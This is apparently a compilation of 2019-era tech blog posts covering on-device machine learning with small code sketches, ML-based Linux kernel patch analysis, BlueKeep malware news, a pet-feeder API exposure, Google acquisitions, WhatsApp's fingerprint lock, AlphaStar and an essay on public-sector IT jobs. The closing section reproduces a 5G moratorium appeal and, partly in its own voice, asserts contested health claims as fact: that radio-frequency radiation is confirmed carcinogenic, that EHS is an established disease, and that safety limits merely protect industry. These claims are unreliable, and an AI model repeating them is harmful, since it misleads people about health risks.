With our current training methods, fine-tuning models on the device is still a long way off. But not all is lost: simple models can already be trained on the device. Classical machine learning models such as logistic regression, decision trees, or a naive Bayes classifier can be trained quickly, especially when using second-order optimization methods such as L-BFGS or conjugate gradient. Even a basic recurrent neural network should be feasible.
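For instance, a logistic regression of this size fits in milliseconds with even plain gradient descent (a second-order method such as L-BFGS, as noted above, would converge in fewer steps). The usage data below is invented for illustration.

```python
import math

# Toy on-device data: hours of app usage -> did the user enable the feature?
xs = [0.5, 1.0, 1.5, 4.0, 5.0, 6.0]
ys = [0,   0,   0,   1,   1,   1]

# One weight, one bias: logistic regression fitted by batch gradient descent.
w, b, lr = 0.0, 0.0, 0.1
for _ in range(2000):
    gw = gb = 0.0
    for x, y in zip(xs, ys):
        p = 1.0 / (1.0 + math.exp(-(w * x + b)))  # predicted probability
        gw += (p - y) * x                          # gradient of log loss w.r.t. w
        gb += (p - y)                              # gradient w.r.t. b
    w -= lr * gw / len(xs)
    b -= lr * gb / len(xs)

predict = lambda x: 1.0 / (1.0 + math.exp(-(w * x + b)))
print(f"P(enable | 5h) = {predict(5.0):.2f}")
```

Two thousand passes over six points is a few tens of thousands of arithmetic operations, negligible even for a phone, which is exactly why classical models are the realistic starting point for on-device training.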

For the keyboard, online learning may work: you can run a training session after the user has typed a certain number of words. The same applies to models using accelerometer and motion data, where the input arrives as a constant stream of numbers. Since these models are trained on a small portion of the data, each update should be fast. So if your model is small and you do not have much data, training will take seconds. But if your model is larger or you have a lot of data, you need to get creative. If a model studies the faces in your photo gallery, it has too much data to process, and you will need to balance the speed and accuracy of the algorithm.
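The streaming case can be sketched with Welford's online mean/variance algorithm: the model state is updated from each small chunk of sensor readings and never needs the full history. The heart-rate numbers are invented for illustration.

```python
class RunningStats:
    """Welford's online mean and variance; O(1) memory per update."""
    def __init__(self):
        self.n, self.mean, self.m2 = 0, 0.0, 0.0

    def update(self, x: float) -> None:
        self.n += 1
        delta = x - self.mean
        self.mean += delta / self.n
        self.m2 += delta * (x - self.mean)

    @property
    def variance(self) -> float:
        return self.m2 / self.n if self.n else 0.0

# Hypothetical heart-rate stream processed in small "training sessions".
stats = RunningStats()
for chunk in [[62, 64, 63], [90, 95, 92], [61, 60]]:
    for sample in chunk:
        stats.update(sample)
    # After each chunk the state is already current, so an anomaly check
    # (e.g. sample far from the running mean) can run immediately.

print(f"mean={stats.mean:.1f}")
```

This chunked-update pattern is the general shape of on-device online learning: constant memory, constant work per sample, and a model that is always up to date between sessions.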

Here are some more problems that you will encounter while learning on the device:

• Large models. For deep learning networks, current training methods are too slow and require too much data. Much research is now devoted to training models on small amounts of data (for example, a single photo) and in a small number of steps. Any progress there will help spread on-device training.

• Multiple devices. You probably use more than one device. The problem of transferring data and models between a user's devices remains to be solved. For example, the Photos application in iOS 10 does not transfer information about people's faces between devices, so it has to be trained on each device separately.

•Application updates. If your application ships with a trained model that adapts to the user's behavior and data, what happens to those adaptations when an app update replaces the model?

Learning on the device is still in the early stages of its development, but it seems to me that this technology will inevitably become important in application development.

The Future Trends of Machine Learning in 2020

Machine Learning Trend To Find Bugs

Can we find bugs in programs through machine learning?

Automated bug detection before a program even runs is a capability researchers are increasingly pursuing. Detecting programming errors and other code quality issues is the big prize here: can errors in the Linux kernel be found before the code is even incorporated? Probably not with conventional tools alone, but machine learning may make it possible.

Using AI, Linux kernel developer Sasha Levin looks for patches for the Stable and Long Term Stable (LTS) trees that improve the code. But can the ML system also be used to find patches that contain bugs? That is a far harder task, says Levin, but he has some clues as to how it could be done.

Microsoft developer Sasha Levin maintains, together with Greg Kroah-Hartman, the so-called stable trees of the Linux kernel. Among other things, Levin uses a machine-learning approach to identify patches that belong in these trees. As he reported in his presentation at this year's Open Source Summit Europe in Lyon, his work has repeatedly prompted the question of whether bugs could be found before they are even incorporated into the kernel. The answer, according to Levin, is anything but simple, as he showed in a detailed analysis.

As many developers know, detecting bad code is not a trivial task. There is already a variety of tools for finding errors, such as static code analysis, but in Levin's view the biggest source of error in Linux kernel development is the development process itself. He tries to back this up with his own analysis.

Objective analysis is difficult to implement

From his personal experience as a maintainer, Levin knows that review, i.e. third-party checking of the code, as well as testing, help prevent the introduction of bugs. It also matters who does the review, how much time it takes, and how thoroughly any disputes are argued out.

These and other factors are difficult to quantify, above all the question of what should count as a bug for the purposes of the original question and investigation. Nevertheless, Levin has tried to translate some of these considerations into a machine-learning model, using a preselected set of code contributions to the kernel.
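Levin has not published the details of his model, but the idea of turning review-process signals into a classifier can be sketched with a tiny Bernoulli naive Bayes over invented binary patch features (late in the RC cycle, merged without review, large diff). Every feature name and data point below is hypothetical, chosen only to show the mechanics.

```python
import math
from collections import defaultdict

# Hypothetical binary features per patch; Levin's real feature set is not public.
# (late_in_rc, no_review, large_diff) -> label 1 = patch later needed a fix
PATCHES = [
    ((1, 1, 0), 1), ((1, 0, 1), 1), ((1, 1, 1), 1), ((0, 0, 0), 0),
    ((0, 0, 1), 0), ((0, 1, 0), 1), ((0, 0, 0), 0), ((1, 0, 0), 0),
    ((0, 0, 1), 0), ((1, 1, 1), 1),
]

def train(data):
    """Bernoulli naive Bayes with Laplace smoothing."""
    counts = {0: defaultdict(int), 1: defaultdict(int)}
    totals = {0: 0, 1: 0}
    n_feats = len(data[0][0])
    for x, y in data:
        totals[y] += 1
        for i, v in enumerate(x):
            counts[y][i] += v
    prior = {y: totals[y] / len(data) for y in (0, 1)}
    # P(feature_i = 1 | class), smoothed so no probability is exactly 0 or 1
    cond = {y: [(counts[y][i] + 1) / (totals[y] + 2) for i in range(n_feats)]
            for y in (0, 1)}
    return prior, cond

def predict(model, x):
    prior, cond = model
    scores = {}
    for y in (0, 1):
        s = math.log(prior[y])
        for i, v in enumerate(x):
            p = cond[y][i]
            s += math.log(p if v else 1 - p)
        scores[y] = s
    return max(scores, key=scores.get)

model = train(PATCHES)
# A patch merged late in the RC phase without review looks risky to this toy model:
print(predict(model, (1, 1, 0)))
```

On this toy data the model flags the late, unreviewed patch as bug-prone, which is exactly the correlation Levin describes; a real system would of course need thousands of labeled commits and far richer features.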

Of course, the model inevitably has weaknesses and cannot be used directly to find faulty code before it enters the kernel's main branch. For Levin, however, the investigation offers some very important clues.

Fast patches just before the deadline have more bugs

Probably the most important finding, according to Levin, is that code added late to RC kernels is about three times as likely as normal to introduce errors. This seems counterintuitive: after the two-week merge window for submitting new features, a roughly eight-week stabilization phase of bug fixes and release candidates (RC) follows before a new Linux version appears.

According to Levin, this result confirms his assumptions about reviews. New features and major changes usually go through a long review phase, and the patches are discussed extensively. In the late RC phase of kernel development, however, patches are merged much faster, and often there is no review at all.

Levin found many patches from this development phase whose code was written, submitted and merged on a single day. With development that rapid, the potential for error naturally increases.

What follows from this insight in the long term for the Linux kernel development process is not really clear to Levin. He has some ideas, but they are difficult to implement. One is a real freeze phase in development, to test changes extensively, though this might simply push the inclusion of last-minute patches even further back.

Similarly, Levin could imagine a standardized approach to accepting patches into the main branch. A prerequisite for acceptance could be a minimum number of days a patch must spend in the linux-next branch before being merged into the main branch. Extensive reviews or tests could likewise be made mandatory, or so-called sign-off tags, which here would mean roughly "approved by".

All these requirements would, according to Levin, meet resistance from a considerable share of developers and maintainers, and are therefore hardly feasible.

Researchers are also using machine learning to spot trends; see the takeaways from the first operational ML conference, USENIX OpML 2019.


2019 Onward: Everyday Is Information Cyber Security Day

The biggest challenge ahead for 5G-, AI- and IoT-driven Industry 4.0 is implementing industrial-grade security systems. Think of smart cities, autonomous vehicles and nuclear plants, and the importance of securing computer networks, and the impact of any cyber attack, becomes obvious. The cyber security day, week and month observances in November 2019 are here to highlight this challenge we will face in the future. Talks, demos, conferences, and an AI/5G/IoT hackathon make up the month of cyber security.

Yet in the midst of all these awareness efforts, a Windows "BlueKeep" cyber attack is happening right now.

Even the U.S. government has warned about the devastating risks of BlueKeep, a security vulnerability discovered in Microsoft's Remote Desktop Protocol implementation that allows remote code execution.

Microsoft describes BlueKeep as a vulnerability of the same caliber as WannaCry. Now security researchers have discovered the first malware that exploits the gap. However, it is still a long way from the worst-case scenario.

Back in May, Microsoft vigorously warned of a vulnerability through which malware could spread on its own, like WannaCry. Now security researchers at Kryptos Logic have for the first time been able to examine malware that exploits the BlueKeep gap. Compared with the vulnerability's potential, however, it seems almost harmless.

Since Microsoft released security updates in May for all supported and even some unsupported operating systems, it has been the calm before the storm. A wave of attacks on unprotected devices that had not installed the security updates was only a matter of time. Gradually, security researchers also released proofs of concept (PoCs) and even exploits for pentesting software. But the big attack was slow in coming.

For the first time, security researchers discovered malware in the wild exploiting the BlueKeep vulnerability. In a honeypot, a deliberately vulnerable computer run by security researchers to detect and analyze malware, they found software that used the loophole to steal computing power for cryptomining. However, the malware crashed the affected honeypot, so the researchers doubt that it works reliably.

The Bluekeep Cryptominer is not a worm

The Bluekeep vulnerability allows malicious code to be executed on an affected Windows system without the need for system authentication or user interaction. A computer worm could self-propagate through the vulnerability from vulnerable computer to vulnerable computer. However, according to the security researchers, the malicious software that has now been discovered does not spread on its own. Instead, the attackers scan for vulnerable systems and then attack them.

One reason for the absence of a BlueKeep worm could be Microsoft's handling of the vulnerability. Security updates and warnings from Microsoft may have contributed to significantly reducing the number of vulnerable devices. "Every month that passes without a worm being released, more people are turning to security updates and the number of vulnerable devices is falling," security researcher Jake Williams told Wired. That no attacker has yet exploited the gap on a large scale could also come down to a cost-benefit calculation: there may be too few affected Windows machines left for it to be worth the effort, Williams explains.

In contrast, WannaCry paralyzed millions of Windows machines in 2017, leading to system failures at a number of companies. Besides railway display boards, many ATM, ticket and gas station machines stopped working. Computers of the mobile operator Telefónica were also affected, and the car manufacturer Renault halted production in some plants as a precaution. The WannaCry malware was based on a vulnerability in Windows SMB hoarded by the US National Security Agency (NSA) and leaked by the hacker group The Shadow Brokers.

Russian Security Researcher Accessed Xiaomi Furry Tail Pet Smart Feeder

The crowdfunded Xiaomi Furrytail feeder is a smart food dispenser that lets us feed our pets remotely on a schedule, using Internet of Things (IoT) technology. A Russian security researcher was able to view and control around 11,000 of the devices worldwide via its API.

Things like this used to happen only in the movies; now they are getting real.

Xiaomi’s Furrytail smart pet food station can automatically feed pets at set times, for example when the pet owner is away from home. The devices are, however, badly secured. By accident, Russian security researcher Anna Prosvetova found that she had access to over 10,000 Furrytail devices. Besides changing feed rations, she could also have altered the devices' firmware. The Furrytail feed station is not made by Xiaomi itself but is sold under the Xiaomi brand. The case was first reported on the Russian blog Habr.

The approximately $80 Furrytail feeding station is suitable for dogs and cats; the amount of feed and the feeding times are set via an app. Through the device API, Prosvetova was able to see 10,950 active Furrytails worldwide. She could have fed the pets of the app owners at the touch of a button or changed the feed rations, the security researcher said, and no password was needed. In addition, it would have been possible to flash modified firmware onto the devices and thus take them over permanently; they could then be misused, for example, for DDoS attacks.

The security researcher initially did not want to publish more details about the vulnerabilities, to give the manufacturer the chance to close them. She reported the gaps about a week ago. According to an e-mail published by Prosvetova, Furrytail has announced an update. However, the researcher will not receive a bug bounty, the e-mail states; so far, the manufacturer has not set up such a program.

Interestingly, although the feed station is sold under the Xiaomi brand, the device is manufactured by Furrytail. Xiaomi said: "The smart pet feed station Furrytail does not belong to Xiaomi's product range, but comes from a third-party manufacturer." The security researcher accordingly turned not to Xiaomi but to the Furrytail manufacturer. Xiaomi has been operating a bug bounty program since 2013.

Google is Buying Fitbit: Now What?

The simple answer to this question is: what are you wearing on your wrist? The main reason for this deal is that Google was outranked by Apple thanks to the Apple Watch (the hardware side), with people switching from Android to Apple. The health and fitness industry is the driving force here.

Fitbit, one of the largest companies in the wearable-devices field, has been snapped up by Google, a worry for Xiaomi and Apple. At the moment the Google-Fitbit acquisition is pending regulatory approval.


After acquiring Fitbit, big G is set to challenge Apple and Xiaomi in fitness wearables, another hitherto untapped area that now has Google's attention.

Google is very aggressive about expanding its business and is also in talks about buying Firework, a video-sharing startup that rivals TikTok.

Google is concerned about TikTok's growing popularity and wants to buy Firework. In download numbers, the short-video social app has been ahead of YouTube and WhatsApp.

Google has been discussing the purchase of the short-video social platform Firework, a competitor of TikTok, The Wall Street Journal reports, citing informed circles. Firework, based in Redwood City, California, was valued at over $100 million in a financing round earlier this year; a purchase price would usually be higher.

Google and Firework have not yet discussed the price of a takeover, according to the report. The negotiations may not lead to an agreement, and it is possible the companies will only become partners.

Weibo, the Chinese Twitter competitor, is also interested in Firework, even if according to informed circles those negotiations are not as advanced as Google's.

Video portals for short clips and other videos are popular with kids and teens. The Chinese short-video app Douyin, known abroad as TikTok, is one such offering. According to the analytics platform Sensor Tower, TikTok's monthly downloads were ahead of WhatsApp, YouTube and Google Maps. According to media reports, the lip-sync app Musical.ly was acquired by Bytedance in November 2017 for around $800 million and merged with TikTok; in Musical.ly, users lip-sync to songs or movie quotes in clips of at most 15 seconds.

TikTok's parent company, Bytedance, based in Beijing, is valued at $75 billion. Facebook responded to TikTok's growing popularity in 2018 with the Lasso app, and Snap has also introduced new features.

Firework was founded last year by former executives of Snap, LinkedIn and JPMorgan Chase. Earlier this year, Firework received approximately $30 million from venture capital firms such as IDG Capital, GSR Ventures and Lightspeed Venture Partners China.

Small Companies being bought out:

It is often a good deal for large organisations to acquire smaller firms because of two main factors: 1) low risk and 2) exponential growth.

Improved buying power, the resources of a larger company, established sales processes, new customer relationships, additional management resources: all of these improve the financial position of the newly acquired business. So big companies buy small companies.

Privacy and Security is in WhatsApp’s DNA

Another Step to make Whatsapp Secure and Private

Facebook-owned, end-to-end encrypted WhatsApp Messenger is a freeware, cross-platform messaging and Voice-over-IP service, but it is not flawless. In 2019 many security experts disclosed vulnerabilities in the app that attackers can exploit. Illegal access to a phone through WhatsApp can expose users to harmful consequences. We have already seen the hacking of a wide group of top government officials' smartphones, sophisticated nation-state attacks, targeted hacking, and misleading functionality through WhatsApp cyber intrusions.

Mark Zuckerberg is trying hard to keep WhatsApp's billions of users secure. As WhatsApp puts it,

privacy and security is in its DNA, so the fingerprint unlock security feature finally arrives for Android users, after iOS.

Fingerprint lock comes to WhatsApp for Android

So far, only iPhone users could lock WhatsApp with Face ID or the fingerprint sensor; now the function is coming to Android devices. Which devices the security option will work on is not yet clear.

WhatsApp has announced that Android users will in future be able to lock the chat app on their smartphone with a fingerprint. WhatsApp had already released the feature for iPhones in early 2019; Android smartphones now follow.

In a blog post, the company writes that the fingerprint lock is offered for "supported Android phones"; which devices are covered is not stated. Apparently WhatsApp on Android, unlike on the iPhone, locks via fingerprint but not via a face scan.

To enable it, tap Settings > Account > Privacy > Fingerprint lock, turn on Unlock with fingerprint, and confirm your fingerprint.

Apparently no authentication by face scan possible

WhatsApp writes that a "similar authentication" will be introduced for Android, but subsequently speaks only of unlocking by fingerprint. Accordingly, we could not use the lock on the Pixel 4 XL in our editorial office. Whether WhatsApp will still provide unlocking by face scan is currently unknown.

The lock can be set to be reactivated immediately after leaving Whatsapp, after one minute, or after 30 minutes. In addition, users can choose whether or not to display message content in Android notifications.

Apparently the update with the new fingerprint lock will ship in waves, so some users may have to wait a little longer than others for the feature.

AI vs. Human

Is AI vs. human intelligence a fair matchup?

Should we stop thinking "AI vs. human" and instead think "AI with human"?

Most experts hold the view that artificial intelligence (AI) is a completely automated process without any human intervention, but in reality most of the input to AI-based systems comes from humans. The concern that AI will replace human beings in the digital workplace is getting closer to reality, but it is just as likely that humans and machines will work together.

This time, under the heading "AI vs. human", another test has been carried out by DeepMind on its artificial intelligence agents, which were trained to play the Blizzard Entertainment game StarCraft II.

The Google-owned AI lab's test environment is its most sophisticated yet, and the software, still called AlphaStar, is now at Grandmaster level in this real-time strategy game, capable of beating 99.8 percent of all human players in competition.

Starcraft AI is already among the best players.

DeepMind's AI AlphaStar started small. It now plays in the Grandmaster ladder against the best human StarCraft 2 players. The system masters Terran, Protoss and Zerg, each as its own neural network.

DeepMind's AI system AlphaStar is already superior to about 99.8 percent of all active players in the real-time strategy game StarCraft. It now plays in the competitive ladder system at the highest level: Grandmaster. Professional players who compete for prize money in tournaments play at this level. Notably, AlphaStar now masters all three playable races, Terran, Protoss and Zerg, and according to the developers has developed tactics against all three.

For each of the three quite different factions, the program uses a separate neural network with its own weights and training data. The current version of AlphaStar also incorporates some predetermined limits: for example, the AI cannot see through the fog of war and has to scout the map, analyze the opponent's base and develop strategies against it. In addition, the system may execute at most about 264 actions per minute.
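How such an action cap might be enforced is not described, but one plausible sketch is a token-bucket limiter refilled at the 264-actions-per-minute rate mentioned above. The class name and the fake clock below are invented for illustration; DeepMind's actual mechanism may differ.

```python
import time

class ActionBudget:
    """Token bucket capping actions per minute (here ~264, per the article)."""

    def __init__(self, per_minute=264, clock=time.monotonic):
        self.rate = per_minute / 60.0        # tokens added per second
        self.capacity = float(per_minute)
        self.tokens = self.capacity
        self.clock = clock
        self.last = clock()

    def try_act(self):
        # Refill according to elapsed time, then spend one token if available.
        now = self.clock()
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True   # action allowed
        return False      # agent must wait

# Simulate one minute with a fake clock and 1000 attempted actions.
t = [0.0]
bucket = ActionBudget(per_minute=264, clock=lambda: t[0])
bucket.tokens = 0.0  # start empty so only the refill rate matters
allowed = 0
for _ in range(1000):
    t[0] += 60.0 / 1000  # attempts spread evenly over 60 seconds
    allowed += bucket.try_act()
print(allowed)
```

However fast the agent tries to click, roughly 264 actions get through per simulated minute, which is the point of such a cap: it forces the AI to win on strategy rather than on inhuman click speed.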

Since the summer of 2019, AlphaStar has been playing in the European ladder against human players. The program does not identify itself, however, and plays with several agents in parallel. Some community members, such as the YouTuber LowkoTV, have probably already played against it; at times its very unconventional tactics give the software away. He was also struck by the fact that AlphaStar agents always play exactly 50 games within a few hours at a time.

German StarCraft player Dario Wünsch, Liquid TLO, works with DeepMind and was involved in the training of AlphaStar. "While AlphaStar has excellent and precise control, it does not feel superhuman," he says. However, the software is not perfect yet: although it can quickly play against different versions of itself and evaluate the results, there is a risk that AlphaStar forgets playing styles from past matches.

The team at DeepMind continues to work on the project. The developers even see the approach as more generally applicable, for example as adaptive computer opponents in other games.

Public Sector vs Private Sector for IT Professionals in the EU

It was mainly my mother who pushed me into a job with a government agency, even though it is my dad who works in public service. A safe job, said my mother, totally relaxed work, good training opportunities, regular salary, and work just five kilometers from home; to my old job I had to drive for an hour. I made the mistake of listening to my mother.

I do not want to give my name, because that would only cause trouble: maybe at home, possibly with the authority I worked for, possibly with my current employer, because I could be seen as a troublemaker. So I remain anonymous, but I assure you that I exist and that everything I report is true.*

Techie in training

I am a nerd, but in the positive sense of the term computer geek: I do not lack social contacts, and I am not the kind of nerd who spends his life behind the computer. Information technology simply fascinates me. Even as a child I dismantled Windows computers and reassembled them. I helped friends with their computers, remotely of course, because in the early 2000s that was the coolest way to help with computer problems.

Later, I turned my hobby into a profession and completed an apprenticeship as a specialist in system integration after gaining my technical college entrance qualification. That was at the beginning of 2017; I was born in 1992. I did not start my apprenticeship until the age of 21; before that I went through just about every type of school imaginable: from secondary school to vocational school, where I earned the Hauptschulabschluss, the Realschulabschluss, and finally the Fachhochschulreife specializing in technology.

The company where I did my apprenticeship was a small, owner-managed mechanical engineering firm with nearly 150 employees. It was really fun, mostly because of the company itself. The owners were older but super loyal, devoted heart and soul to their company and employees. I felt in good hands and turned my hobby knowledge into professional skills. As an apprentice I sometimes had to dispose of the boxes from new computers, but mainly I was integrated into the company's processes and worked in level 1 and 2 support from the first year of my apprenticeship.

To differentiate competencies, support is divided into three levels: first-, second-, and third-level support, the latter requiring the highest expertise. In my year there were six IT apprentices. Two were kept on; four had to go, including me. That had nothing to do with me or the other three: the business situation was simply not good at the time.

The job prospects are not as rosy as everyone says

After that, I spent three months with an IT service provider in user support, a small company of eight people. I felt constantly watched and monitored and had to bill the customer for every minute. The job was stressful, thankless and poorly paid. So I answered job advertisements and quickly found a new position, though in the form of temporary employment, what some call temp work or agency work.

The temp agency placed me with a customer, again in level 1 and 2 IT support, at a medium-sized production company with 1,400 employees. Five months later, the company hired me permanently.

In my experience, the job prospects for IT professionals are not as bright as everyone claims, even in economically strong regions. Before you get a permanent contract, you have to prove yourself, even with completed vocational training and work experience. I stayed at the company for a year; then I followed my mother's advice.

Up on Paper, Down in Everyday Life

I got the job at the agency surprisingly fast: Germany's public service is desperately looking for IT people, while private companies hunt candidates with much better salaries. The office was a small, rural authority, the kind everyone has been to, where ID cards are renewed, marriages are performed, or extracts of land registry maps are issued. My job was again user support, for the first time covering levels 1 through 3, the full range. On paper I had moved up professionally. In everyday life, I had fallen deeply.

Welcome to the Stone Age Support!

The internal organization in the agency was pure chaos. There was no ticket system for support; almost everything was stored in Word and PDF files. Welcome to Stone Age support! After some time I worked up the courage to suggest to the team leader that we introduce a ticket system. It was supposed to facilitate work distribution and the organization of support, especially because we were five in the IT team across five locations.

I also suggested setting up a central hotline to help colleagues with IT issues, and advised using a document management system to centralize knowledge about our operations and break it down into processes. The first attempt at change failed: my team leader had a great deal of IT understanding but did not want to change his way of working or that of the team.

The man is over 50 and has been in public service for 25 years. He was always friendly and always available for problems or questions, but when it came to changes in work processes he was fundamentally skeptical. The chaos had become daily routine, and without the chaos he would probably have felt something fundamental was missing.

A few weeks later, a meeting of several dozen IT staff from all kinds of authorities took place, organized by the higher authority. The introduction of a ticket system was proposed there, but there were too many objections, so the topic was shelved.

I quit shortly thereafter, ending the public-service nightmare after half a year. The job demotivated me, bored me and made me doubt myself. Since then I have had a certain aversion to job offers from the civil service.

Work like chewing gum

At my authority, people definitely worked less than in the private sector. If a colleague had problems with his computer, the solution was never really urgent; people are used to killing time. On several days of the week I had nothing left to do by the afternoon, because I am not the type to stretch a little work over a long day so that there is always something to do.

Out of boredom, I once disposed of the cardboard from a truckload of new PCs, until a colleague advised me that that was the caretaker's job; otherwise he would have nothing left to do. So as not to kill time pointlessly, I sometimes studied privately during working hours or read professional articles. Our supervisor even encouraged this, maybe because it is less obvious then that you have nothing to do; at least you are staring at the screen. People who cannot be put under pressure and who can stretch work out like chewing gum fit in well at an authority.

Everything Takes Time

Less work, less money: you would think that is fair, but it is not. In big and important authorities, mostly located in the centers, the IT people have to do a lot of good work, as I learned in cooperation with higher-level bodies. Yet they earn the same as an IT person in a small provincial office. Authorities pay flat rates for everything, which is a big problem for the employees there.

Then there is the bureaucracy: everything takes longer in an agency than in a private company. Hardly any employees have work cell phones, the offices have no Wi-Fi, and almost no authority is active on social networks, for example for recruiting, even though for young people like me these are a second home. I once suggested to the authority's staff council that we look for new employees on social media. It was rejected immediately.

My current employer found me there, though. Since March of this year I have been working at the foundation of a well-known IT pioneer in Germany, again largely in IT support. A foundation is the ideal mix of public service and business: there is no pressure to earn money, but enough money for IT. This combination makes for relaxed work and interesting tasks; in it I have found the right professional balance for me. Proximity to home is no longer so important: for this job and my girlfriend, I moved 500 kilometers away from home.

Scientists Warn of Health Risks From 5G

Scientists Warn of Health Risks From 5G

5G Health Risks: International Appeal Calls for a 5G Moratorium

International scientists and physicians warn of health risks from the 5G mobile communications standard and demand a moratorium. They call for a review of the technology, new, safe "maximum overall exposure" limits for all wireless communications, and an expansion of wired digital telecommunications.

“Scientists warn of potentially serious health effects of 5G cellular technology”

More than 180 scientists and physicians from 36 countries recommend a moratorium on the rollout of the fifth generation of telecommunications until potential risks to human health and the environment have been fully explored by industry-independent scientists. 5G will greatly increase exposure to radio-frequency electromagnetic fields (RF-EMF), adding to the GSM, UMTS, LTE, WLAN, etc. already used for telecommunications. RF-EMF, the signatories argue, has been shown to be harmful to humans and the environment, and 5G leads to a massive increase in forced exposure to wireless communication.

5G technology works only over short distances, and the signals pass poorly through solid material. Many new antennas will be needed; a full rollout would result in urban antennas spaced every 10 to 12 houses, greatly increasing forced exposure.

With "the ever-increasing use of wireless technologies," nobody can avoid exposure. In addition to the increased number of 5G base stations (even within homes, shops and hospitals), "10 to 20 billion wireless connections" (refrigerators, washing machines, surveillance cameras, self-driving cars and buses, etc.) will be part of the Internet of Things. All of this together, the appeal warns, could lead to an exponential increase in the total long-term exposure of all EU citizens to radio-frequency electromagnetic fields (RF-EMF).

Harmful effects of RF-EMF have already been demonstrated, the appeal states. Over 230 scientists from more than 40 countries have expressed their "serious concern" regarding the ubiquitous and increasing exposure to electromagnetic fields from electrical and wireless devices, even before the addition of 5G. They point out that "numerous recent scientific publications have shown that electromagnetic fields affect living organisms, even at intensities well below most international and national limits." The cited effects include increased cancer risk, cell stress, an increase in harmful free radicals, genetic damage, structural and functional changes in the reproductive system, learning and memory deficits, neurological disorders, and adverse effects on general well-being in humans. Nor does the claimed damage affect only humans: there is, they say, increasing evidence of adverse effects in plants and animals.

After the scientists' appeal was written in 2015, additional research has reinforced their concerns about serious health risks from the RF-EMF of wireless technology. The $25 million National Toxicology Program (NTP) study, the largest in the world, shows a statistically significant increase in the incidence of brain and heart cancer in animals exposed to electromagnetic fields below the limit values of the ICNIRP (International Commission on Non-Ionizing Radiation Protection), which apply in most countries. These results support findings in human epidemiological studies on high-frequency radiation and brain-tumor risk. A large number of peer-reviewed scientific reports describe damage to human health from electromagnetic fields.

The International Agency for Research on Cancer (IARC), the World Health Organization’s (WHO) cancer research agency, concluded in 2011 that electromagnetic fields at frequencies from 30 kHz to 300 GHz are possibly carcinogenic to humans (Group 2B). However, new studies, such as the NTP study mentioned above, as well as several epidemiological studies, including the most recent studies on cell phone use and brain cancer risk, confirm that radio frequency radiation is carcinogenic to humans.

The EUROPAEM EMF Guideline 2016 states: “There is strong evidence that long-term exposure to certain EMFs is a risk factor for diseases such as certain cancers, Alzheimer’s disease and male infertility. Common symptoms of EHS include headache, difficulty concentrating, sleep disorders, depression, lack of energy, fatigue, and flu-like symptoms.”
An increasing proportion of Europe’s population is affected by symptoms that the scientific literature has for many years associated with exposure to electromagnetic fields from wireless technologies. The International Scientific Declaration on EHS & Multiple Chemical Sensitivity (MCS), Brussels 2015, states: “In light of our current scientific knowledge, we underline that all national and international bodies and organizations … recognize EHS and MCS as actual medical conditions. They have the role of sentinel diseases. In the coming years, there could be far-reaching public health problems. This applies to all countries in which wireless technologies based on electromagnetic fields, as well as marketed chemical substances, are used without restrictions. … Inaction leads to costs for society and is no longer an option. We unanimously acknowledge this grave threat to public health.”

Precautionary Measures


The precautionary principle (UNESCO) was adopted by the EU in 2005: “If human activities can cause morally unacceptable damage that is scientifically plausible but uncertain, action must be taken to prevent or reduce that damage.”

Resolution 1815 (Council of Europe, 2011) calls on member states to: “Take all reasonable measures to reduce exposure to electromagnetic fields, in particular to high-frequency waves from mobile phones, and especially the exposure of children and young people, for whom the risk of brain tumors seems greatest. … The Assembly strongly recommends that the ALARA principle (as low as reasonably achievable) be applied. Both the so-called thermal effects and the athermal (non-thermal) or biological effects of electromagnetic emissions or radiation must be taken into account.” In addition (point 8.5), “the standards and the quality of the risk assessment must be improved.”

The Nuremberg Code (1949) applies to all experiments on humans, and therefore also covers the rollout of 5G with its new, stronger exposure to RF-EMF. For all such experiments: “The experiment should be so designed and based on the results of animal experimentation and a knowledge of the disease or research problem under study that the anticipated results will justify the performance of the experiment. … No experiment should be conducted where there is an a priori reason to believe that death or disabling injury will occur.” (Nuremberg Code, points 3–5). Previously published scientific studies show that there is indeed “an a priori reason” to expect real health risks.

The European Environment Agency (EEA) warns against “radiation risks from everyday equipment”, even though the radiation is below the WHO/ICNIRP limits. The EEA also concludes: “There are many examples where the precautionary principle was not applied in the past and where serious and often irreversible damage to health and the environment resulted. … harmful exposures can be widespread before there is both ‘convincing’ evidence of damage from long-term exposure and a biological understanding [mechanism] of how this damage is caused.”
“Safety Guidelines” Protect the Industry, Not Health

The current ICNIRP “safety guidelines” are outdated. All of the documented damage mentioned above occurs even though the radiation is below the ICNIRP limits. That is why new safety standards are required.

The reason for the misleading guidelines lies in the conflict of interest of ICNIRP members due to their relationships with telecommunications or electricity companies. “This undermines the impartiality that should guide the establishment of public exposure standards for non-ionizing radiation. … To assess cancer risks, it is necessary to include scientists with expertise in medicine, especially oncology.” The current ICNIRP/WHO guidelines for electromagnetic fields are based on the outdated hypothesis that “the critical effect of RF-EMF exposure relevant to human health and safety is the heating of exposed tissue.” However, scientists have shown that many different types of diseases and injuries are caused without heating (“non-thermal effects”) at radiation intensities well below the ICNIRP limits.


We strongly urge the EU:


1) To take all reasonable measures to halt the rollout of 5G high-frequency electromagnetic fields (RF-EMF) until independent scientists can ensure that 5G and the total radiation levels caused by RF-EMF (5G together with GSM, UMTS, LTE and WLAN) will not be harmful to EU citizens, especially infants, children and pregnant women, or to the environment.
2) To recommend that all EU countries, and in particular their radiation protection authorities, comply with resolution 1815 and educate their citizens, including teachers and physicians, about health risks from RF EMF radiation and how and why wireless communication should be avoided, in particular in / on / near day care centers, schools, housing, workplaces, hospitals and aged care facilities.
3) Immediately, without industry interference, appoint an EU working group of independent, genuinely impartial scientists on EMF and health without conflict of interest, to assess health risks and:
a) To decide on new, safe “maximum total exposure limits” for all wireless communication within the EU.
b) To explore the total and cumulative exposure that affects EU citizens.
c) To draw up rules to be prescribed and enforced within the EU on how to avoid exceeding the new “maximum total exposure limits”, covering all types of electromagnetic fields, in order to protect citizens, especially infants, children and pregnant women.
4) To prevent the wireless communications/telecommunications industry from persuading EU officials, via its lobbying organizations, to make decisions on the further spread of high-frequency radiation in Europe, including 5G.
5) To prefer and expand wired digital telecommunications.

Millimeter wave health effects:

3GPP Release 16 (5G Phase 2) includes enhanced features such as 5G operation above the 52.6 GHz band. Frequencies in the range between 30 and 300 GHz are called mmWave or millimeter waves. The millimeter wave (mmWave) bands between 30 and 300 GHz offer massive amounts of raw bandwidth that enable multi-gigabit-per-second (Gbps) wireless data rates. The main safety concern here is heating of the eyes and skin caused by the absorption of mmWave energy in the human body.
